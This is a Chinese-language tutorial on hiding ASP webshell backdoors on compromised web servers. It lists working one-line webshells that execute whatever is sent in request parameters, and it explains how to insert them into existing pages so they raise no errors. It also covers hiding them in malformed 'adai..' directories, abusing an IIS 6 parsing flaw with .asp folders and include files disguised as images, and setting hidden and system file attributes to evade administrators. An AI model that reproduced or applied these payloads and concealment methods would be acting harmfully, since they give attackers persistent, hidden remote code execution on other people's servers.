后門木馬隱藏技術—webshell的隱藏

比較笨的方法就是找一些比較深或者比較隱蔽的地方放自己的ASP木馬，這個就不用我說了吧。

下面這些方法，只要大家利用好，做個隱藏的ASP后門是不成問題的。

1.插馬法

其實，我們可以直接把一句話插入已經(jīng)存在的頁面了，但是，問題出來了，像常用的

<%execute(request("a"))%>   
<%execute(request("value"))%>   
<%eval request("#")%>   
<%if request("cnxhacker")<>"" then Session("b")=request("cnxhacker")  
if Session("b")<>"" then execute Session("b")%>  

等等，這些一句話一插進去的話，就會報錯，一下就會被發(fā)現(xiàn)...其實，我們忽略了一個天天在用的S端

<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form('#')+'')</SCRIPT> 

冰狐的一句話客戶端，這個調用的是Javascript腳本，跟調用Vbscript不同，Javascript是運行在客戶端的，也就上一HTML端，所以我們可以直接把他插入在頁面中，而不報錯。這樣，就達到了隱藏后門的技術。（建議大家找個比較大的頁面，隨便插在</td>,</tr>,</body>這些標簽后門都可以的）

2.建立非標準目錄

這個只要有CMDshell 就可以了，當然提權***。直接在站點跟目錄下建立個文件夾，DOS法：md adai.. 然后在拷貝自己的木馬到這個目錄下，比如木馬在d:\web\wind.asp 就把他拷貝到d:\web\adai..\wind.asp 這樣，也可以起到隱藏作用。

3.include調用法

知道最近出了個動易的ODAY么，就是利用03服務器的IIS解析的漏洞，我給大家講解下，03服務器會對asp的文件進行解析，這樣就可以達到我們隱藏后門的技術了，大家會經(jīng)?？吹?/p>

：<!--#include file=”.../conn.asp”--> 

之類的代碼吧，OK，咱們就利用這個方法來隱藏。

先建立個普通的asp文件夾（記著，是文件夾），例如adai.asp，然后再在adai.asp里面建立個圖片文件如adai.jpg。在里面插入一句話代碼。然后在建立個文本文件如wind.txt，接著在wind.txt里插入：<!--#include file=”.../adai.jpg”-->。這樣咱們在訪問站點的wind.txt時，就是我們的一句話后門了，有些菜鳥可能會問

<!--#include file=”.../adai.jpg”-->  

是ASP的內容，怎么能在JPG里生效呢？我剛才不是說了么，03服務器的IIS會解析asp文件么。所以我們在訪問adai.jpg時，他就誤認為在訪問wind.asp了。這種方法在隱藏方面也是很不錯的，大家可以把adai.jpg放在別的目錄里，記得更改下include file里的路徑就可以了。
如果怕被管理員發(fā)現(xiàn)adai.asp時，咱們可以把他隱藏起來啊 DOS下輸入：

attrib +H +S adai.asp 

木馬的防止一直是令人頭疼的事，希望大家通過以上的介紹能夠了解了后門木馬的隱藏技術，已達到知己知彼百戰(zhàn)百勝，

【編輯推薦】

1. 木馬釋放器集合惡意程序
2. 木馬強化惡意文件迷惑性
3. 給你預防病毒的八個忠告
4. 解析專攻Mac的木馬 圖解